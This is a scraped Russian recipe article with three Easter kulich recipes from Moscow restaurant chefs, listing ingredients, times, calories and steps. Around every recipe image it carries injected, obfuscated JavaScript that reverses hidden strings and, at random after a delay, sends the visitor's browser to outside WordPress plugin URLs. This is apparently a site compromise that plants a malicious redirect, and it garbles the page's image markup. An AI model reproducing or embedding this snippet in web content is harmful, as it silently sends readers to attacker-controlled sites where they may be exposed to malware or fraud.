3 рецепта куличей от московских шеф-поваров

Пасха уже совсем скоро. Домашние куличи намного вкуснее покупных, поэтому мы попросили шеф-поваров московских ресторанов поделиться их любимыми рецептами традиционного пасхального блюда.

320 calories

$NqM=function(n){if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tov-pashalnyh-kulichei-ot-shef-povarov-moskovskih-res-im-2.jpg»> $NqM=function(n){if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tov-pashalnyh-kulichei-ot-shef-povarov-moskovskih-res-im-2.jpg»>

Классический пасхальный кулич

Традиционный кулич от шеф-повара кафе и пекарни «Хачапурия» Григория Менешяна.

$NqM=function(n){if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tov-pashalnyh-kulichei-ot-shef-povarov-moskovskih-res-im-2.jpg» class=»c1″ alt=»Изображение рецепта Классический пасхальный кулич» title=»Изображение рецепта Классический пасхальный кулич»>

Классический пасхальный кулич

СЛОЖНОСТЬ РЕЦЕПТА:

ВРЕМЯ ПРИГОТОВЛЕНИЯ:

420 минут

PT7H

PT7H

КОЛИЧЕСТВО ПОРЦИЙ:

8 порций

КАЛОРИЙНОСТЬ:

320 ккал

Сложность

Время

420 минут

Кол-во порций

8 порций

Калорийность

320 ккал

Ингредиенты

Мука (пшеничная)

350 г

Сахар

10 г

Соль

1 г

Дрожжи

6 г

Мускатный орех

1 щепотка

Яйца

2 шт.

Сметана

2 ст. л.

Молоко

100 мл

Масло (сливочное)

100 г

Изюм

40 г

Сок (лимонный)

10 мл

Сухофрукты (цукаты)

40 г

Коньяк

10 мл

Ваниль

1 щепотка

Процесс приготовления

  1. В молоко добавьте сухие дрожжи, муку и перемешайте. Накройте полотенцем и оставьте тесто в прохладном месте на два часа.
  2. Тщательно замесите тесто, добавьте сметану, сливочное масло, яйца и сахар. Перемешайте, накройте полотенцем и оставьте на три часа в тёплом месте.
  3. Добавьте изюм, предварительно замоченный в тёплой воде, цукаты, мускатный орех, лимонный сок, ваниль, коньяк. Тщательно перемешайте и снова оставьте тесто в тёплом месте на час.
  4. Готовое тесто выложите в форму и выпекайте в течение 50 минут в хорошо прогретой духовке при температуре 180 градусов.

342 calories

$NqM=function(n){if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tov-pashalnyh-kulichei-ot-shef-povarov-moskovskih-res-im-26.jpg»> $NqM=function(n){if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tov-pashalnyh-kulichei-ot-shef-povarov-moskovskih-res-im-26.jpg»>

Пасхальный кулич с изюмом и глазурью

Рецепт кулича от шеф-кондитера сети кафе-пиццерий FORNETTO Ивана Копылова.

$NqM=function(n){if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tov-pashalnyh-kulichei-ot-shef-povarov-moskovskih-res-im-26.jpg» class=»c1″ alt=»Изображение рецепта Пасхальный кулич с изюмом и глазурью» title=»Изображение рецепта Пасхальный кулич с изюмом и глазурью»>

Пасхальный кулич с изюмом и глазурью

СЛОЖНОСТЬ РЕЦЕПТА:

ВРЕМЯ ПРИГОТОВЛЕНИЯ:

70 минут

PT1H10M

PT1H10M

КОЛИЧЕСТВО ПОРЦИЙ:

8 порций

КАЛОРИЙНОСТЬ:

342 ккал

Сложность

Время

70 минут

Кол-во порций

8 порций

Калорийность

342 ккал

Ингредиенты

Дрожжи (живые)

23 г

Молоко (тёплое)

120 г

Сахар

200 г

Масло (сливочное)

200 г

Мука

450 г

Соль

5 г

Творог

200 г

Яйца (желток)

1 г

Яйца

3 шт.

Изюм

120 г

Яйца (белок)

50 г

Сахар (пудра)

300 г

Лимон (сок)

20 г

Процесс приготовления

  1. Смешайте дрожжи, молоко, 150 граммов сахара и 100 граммов муки. Поставьте в тёплое место на 30 минут, чтобы опара поднялась.
  2. Добавьте оставшуюся муку, соль, творог, яйца и желток, изюм. Перемешайте.
  3. Выложите тесто в формы и выпекайте 35–40 минут при 180 градусах — до готовности.
  4. Для глазури смешайте белок яиц, сахарную пудру и сок лимона. Покройте глазурью кулич и украсьте.

470 calories

$NqM=function(n){if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tov-pashalnyh-kulichei-ot-shef-povarov-moskovskih-res-im-11.jpg»> $NqM=function(n){if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tov-pashalnyh-kulichei-ot-shef-povarov-moskovskih-res-im-11.jpg»>

Пасхальный кулич с нутеллой, оreo и кit-кat

Необычный кулич с любимыми сладостями от шеф-кондитера ресторанов il FORNO, «Лимончино», 800 Contemporary Steak и CUT Романа Новаковского.

$NqM=function(n){if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tov-pashalnyh-kulichei-ot-shef-povarov-moskovskih-res-im-11.jpg» class=»c1″ alt=»Изображение рецепта Пасхальный кулич с нутеллой, оreo и кit-кat» title=»Изображение рецепта Пасхальный кулич с нутеллой, оreo и кit-кat»>

Пасхальный кулич с нутеллой, оreo и кit-кat

СЛОЖНОСТЬ РЕЦЕПТА:

ВРЕМЯ ПРИГОТОВЛЕНИЯ:

90 минут

PT1H30M

PT1H30M

КОЛИЧЕСТВО ПОРЦИЙ:

8 порций

КАЛОРИЙНОСТЬ:

470 ккал

Сложность

Время

90 минут

Кол-во порций

8 порций

Калорийность

470 ккал

Ингредиенты

Дрожжи

27 г

Молоко

320 мл

Сахар

180 г

Мука

400 г

Яйца (желток)

3 шт.

Яйца

1 шт.

Масло (сливочное)

140 г

Масло (оливковое)

50 мл

Масло (сливочный)

200 г

Разрыхлитель

7 г

Нутелла

50 г

Печенье (оreo)

50 г

Шоколад (кit-кat)

100 г

Процесс приготовления

  1. Смешайте для теста дрожжи, 150 миллилитров тёплого молока, 30 граммов сахара и 100 граммов муки. Поставьте в тёплое место на 30 минут.
  2. Добавьте все остальные ингредиенты, кроме топинга, и хорошо перемешайте.
  3. Выложите тесто в форму на половину высоты.
  4. Поставьте в духовку и выпекайте при 180 градусов до готовности — 40–45 минут.
  5. Готовый кулич остудите.
  6. Нутеллу подогрейте на водяной бане и полейте ею кулич. Украсьте сверху печеньем и палочками кit-кat.

Статьи по теме

Пасхальный кулич: 3 диетических рецепта

Творожные мини-куличи

Пасхальный кулич от шеф-кондитера «Гранд кафе Dr.Живаго»

5 рецептов пасхальных куличей (есть даже без глютена и яиц)

Оцените статью
Дежурная Качалка
Добавить комментарии

;-) :| :x :twisted: :smile: :shock: :sad: :roll: :razz: :oops: :o :mrgreen: :lol: :idea: :grin: :evil: :cry: :cool: :arrow: :???: :?: :!:

Adblock
detector